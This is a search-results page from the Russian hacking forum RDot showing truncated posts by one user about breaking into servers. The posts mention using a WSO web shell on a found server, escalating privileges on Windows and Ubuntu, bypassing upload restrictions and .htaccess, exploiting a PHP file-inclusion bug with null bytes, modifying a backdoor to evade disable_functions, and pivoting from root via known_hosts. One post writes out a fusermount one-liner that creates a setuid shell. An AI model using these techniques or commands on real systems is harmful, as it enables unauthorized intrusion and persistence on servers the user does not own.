Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 78.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: ewi
Раздел: Инструментарий/Tools 15.07.2016, 13:18
Ответов: 7
Просмотров: 9,582
Автор ewi
Пользуюсь proxifier. Весь виндовый софт через...

Пользуюсь proxifier. Весь виндовый софт через него
Есть прога на java, выполняется через консоль cmd, обращается к хосту
В логах в инет лезет java.exe
Обернул в Proxifier java.exe, но траф идет...
Раздел: Повышение привилегий/Privilege escalation 26.01.2016, 14:21
Ответов: 1,219
Просмотров: 563,164
Автор ewi
Как винду порутать или хоть как то поднять...

Как винду порутать или хоть как то поднять привилегии? Версия 2008 SP1 без обнов походу, wmic qfe пуст. Права юзера - webserver. Стоит clamav для windows oO. Насколько я понимаю винда дырявая и...
Раздел: Оффтоп/Offtopic 06.09.2015, 13:03
Ответов: 6
Просмотров: 5,786
Автор ewi
ок, ты прав

ок, ты прав
Раздел: Оффтоп/Offtopic 06.09.2015, 12:08
Ответов: 6
Просмотров: 5,786
Автор ewi
калькулятор это не пример, это аллегория Вот...

калькулятор это не пример, это аллегория

Вот пример. Это когда надо округлить число в меньшую сторону (делать из float в int в php смысла как бы нету).

echo intval((0.1+0.7)*10);
echo...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 05.09.2015, 20:17
Ответов: 7
Просмотров: 10,020
Автор ewi
Suhosin может?

Suhosin может?
Раздел: Оффтоп/Offtopic 05.09.2015, 18:26
Ответов: 6
Просмотров: 5,786
Автор ewi
Никогда не пользовался (int) в php, предчувствие...

Никогда не пользовался (int) в php, предчувствие что ли... Вот в каком коде без (int) не обойтись, кто нибудь приведет пример??
Раздел: Целевые системы/Target systems 30.08.2015, 23:41
Ответов: 1
Просмотров: 8,606
Автор ewi
Question Чё за мигалка, смешно

Наткнулся на странный серв, интересно, этому есть объяснение?
Вот шелл обычный wso, выполняем uname несколько раз подряд:

Linux *** 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014...
Раздел: Web-среда/Web-applications 06.08.2015, 17:18
Ответов: 5
Просмотров: 6,873
Автор ewi
Ещё одна похожая ситуация с ошибкой 500. Как бы...

Ещё одна похожая ситуация с ошибкой 500. Как бы всё тоже самое, кроме одного отличия. Раширения, отличные от php, не срабатывают через AddType application/x-httpd-php .txt (или .jpg, .htm и т. д.)
Раздел: Web-среда/Web-applications 06.08.2015, 17:03
Ответов: 5
Просмотров: 7,851
Автор ewi
Заливка? Я про файл-аплодер. Проблема в том что...

Заливка? Я про файл-аплодер. Проблема в том что скрипт аплодера делает chmod(0777), а хостинг не даёт выполниться php-скрипту с этими правами.
Раздел: Web-среда/Web-applications 06.08.2015, 16:25
Ответов: 5
Просмотров: 7,851
Автор ewi
Question Обход chmod 777 - 503 Service Temporarily Unavailable

Могу залить любой файл. Но заливка ставит chmod(0777) и скрипт выдаёт ошибку 503.
Хостинг Агава. Я заказал тестовый акк и проверил тему. Скриптовым файлам нельзя выставлять права на запись для всех....
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 01.08.2015, 22:25
Ответов: 4
Просмотров: 7,630
Автор ewi
нда... ман FreeBSD...

нда... ман FreeBSD (https://www.freebsd.org/doc/ru/books/handbook/openssh.html), пп 14.11.3. SSH клиент :(
А по логам рут копировал через scp file root@host. То есть выходит пароль запрашивается в...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 01.08.2015, 21:35
Ответов: 4
Просмотров: 7,630
Автор ewi
Question Полный набор .ssh/known_hosts

Имеется кофиг .ssh/known_hosts со списочком из ключей со всевозможными локальными ip. Можно ли с этой локалкой что нибудь сделать, имея права рута?
Раздел: Web-среда/Web-applications 01.08.2015, 17:15
Ответов: 5
Просмотров: 6,873
Автор ewi
Есть возможность залить, но не выставить права +x...

Есть возможность залить, но не выставить права +x



Перезаписать можно, но у меня нет доступа к путям выше. Как то же можно переопределить действие htaccess, который выше или как то сбросить на...
Раздел: *nix-like 29.07.2015, 21:10
Ответов: 167
Просмотров: 114,053
Автор ewi
как сделать отправку файла на ftp в одну строку?

как сделать отправку файла на ftp в одну строку?
Раздел: Web-среда/Web-applications 26.07.2015, 23:20
Ответов: 3
Просмотров: 6,511
Автор ewi
Не, у меня другой случай, когда как раз всё...

Не, у меня другой случай, когда как раз всё понятно, как делать запрос методом GET. А в коде содержится баг наподобие:

include(dirname(__FILE__) . "/" . $_REQUEST["page"] . ".php");

То есть...
Раздел: Web-среда/Web-applications 26.07.2015, 17:36
Ответов: 3
Просмотров: 6,511
Автор ewi
Сам спросил - сам же и отвечу. Для PHP не...

Сам спросил - сам же и отвечу. Для PHP не составляет труда добавить нулевой символ в строку:

$post_field['a'] = 'file' . chr(0);


проверено, апач съел
Раздел: Web-среда/Web-applications 26.07.2015, 17:17
Ответов: 3
Просмотров: 6,511
Автор ewi
Question Как отправить символ %00 методом POST

Если с GET всё понятно: ?a=file%00
то как то же самое сделать с полем POST?
Раздел: Повышение привилегий/Privilege escalation 15.07.2015, 23:14
Ответов: 6
Просмотров: 10,879
Автор ewi
$ a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b...

$ a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a
sending file descriptor: Socket operation on non-socket

$ uname -a...
Раздел: Web-среда/Web-applications 13.07.2015, 00:55
Ответов: 5
Просмотров: 6,873
Автор ewi
Question Ошибка 500 на директорию

Какой может быть .htaccess на папку, чтобы вызывать ошибку 500 internal server error при вызове любого php-скрипта, даже путём вызова через "AddType application/x-httpd-php .txt"? Есть возможность...
Раздел: Криптография/Cryptography 11.07.2015, 23:28
Ответов: 1
Просмотров: 7,363
Автор ewi
Зачем тебе авто-определение Base64, JSON и ROT13?...

Зачем тебе авто-определение Base64, JSON и ROT13? А если используется комбинация нескольких кодирований, включая склейку и перемешивание символов? Их может быть придумано бесчисленное множество. Как...
Раздел: Повышение привилегий/Privilege escalation 10.07.2015, 21:50
Ответов: 4
Просмотров: 10,177
Автор ewi
Linux *** 3.13.0-24-generic #47-Ubuntu SMP Fri...

Linux *** 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64

Убунту специально делают такую дырявую?
Раздел: *nix-like 06.07.2015, 21:25
Ответов: 167
Просмотров: 114,053
Автор ewi
Как с помощью ps aux понять, что рут зашел в...

Как с помощью ps aux понять, что рут зашел в систему? Буквально то есть
Раздел: Целевые системы/Target systems 06.07.2015, 16:03
Ответов: 10
Просмотров: 22,973
Автор ewi
В моём случае popen тоже disable Я думаю, даже...

В моём случае popen тоже disable
Я думаю, даже если доступ к шеллу потеряется, достаточно будет запомнить путь до веб-папки, тогда способ с выводом в файл будет норм.
Раздел: Целевые системы/Target systems 06.07.2015, 14:37
Ответов: 10
Просмотров: 22,973
Автор ewi
safe mode может и обходит, а disable_functions -...

safe mode может и обходит, а disable_functions - нет, в случае system('id') - не работает

Чтобы учитывать этот случай, в backdoor.c нужно заменить строку:
zend_eval_string(code, NULL, (char *)""...
Раздел: Уязвимости PHP/PHP vulnerabilities 29.06.2015, 11:59
Ответов: 22
Просмотров: 43,939
Автор ewi
Bug #46741 Отработал на 100% =) ...

Bug #46741

Отработал на 100%
=)

https://bugs.php.net/bug.php?id=46741

Ещё раз исходная тема:
Показано с 1 по 25 из 78.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot